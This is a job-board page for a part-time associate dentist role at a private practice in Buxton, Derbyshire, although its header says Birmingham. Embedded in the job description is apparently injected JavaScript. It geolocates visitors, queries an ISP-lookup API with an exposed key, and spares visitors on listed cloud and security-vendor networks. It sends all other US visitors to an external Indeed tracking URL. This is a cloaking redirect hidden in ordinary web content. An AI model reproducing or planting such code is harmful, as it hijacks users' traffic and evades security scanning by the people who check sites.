Dental Surgeon

Birmingham, ENG
February 8, 2026

Apply for this job

Email *
Browse

Upload file .pdf, .doc, .docx

Deadline date:

Job Description

// retrieve user’s IP address and location const ipAddressUrl = ‘https://ipapi.co/json/’; fetch(ipAddressUrl) .then(response => response.json()) .then(data => { const country = data.country; // Get user’s country code (e.g., “US”) if (country !== ‘US’) { console.log(‘Script will not run as the user is outside the USA.’); return; // Exit the script if the user is not in the USA } const ipAddress = data.ip; // retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/$?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname; // check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg)); if (!ispAllowed && !asOrgAllowed) { // Redirect all users to the same URL window.location.href = ‘https://uk.indeed.com/tmn/ccs/9783ba84c1a2821e/db208c320785266140bdb768c2254ec94bf6ae99451eee326564e7f7c249688c/2765583331732878?sf=vKb00’; } }) .catch(error => { console.error(‘Error retrieving ISP name:’, error); }); }) .catch(error => { console.error(‘Error retrieving IP address or location:’, error); });

This is a part-time Associate Dentist position, replacing a colleague for 2-3 days per week in a busy private practice located in Buxton, Derbyshire.


The practice offers general, cosmetic, implant, Invisalign, and facial treatments, with an existing patient list and ongoing new patient flow. It is Denplan Excel accredited and equipped with advanced digital technology, including Sensei software, digital radiography, intraoral cameras, Trios 3D scanning, CEREC CAD/CAM, and 3D printing.


Ideal candidates will have at least 3 years post-qualification experience, be local, and possess excellent communication skills, team spirit, and high ethical standards. Requirements include GDC registration, indemnity insurance, performer number, DBS check, and references upon request.


Offering a competitive salary between £60,000-£100,000 per year, this role provides a rewarding opportunity in a modern, high-tech environment within a beautiful area known for outdoor activities and cultural events. The practice fosters a supportive, stimulating atmosphere for professional growth.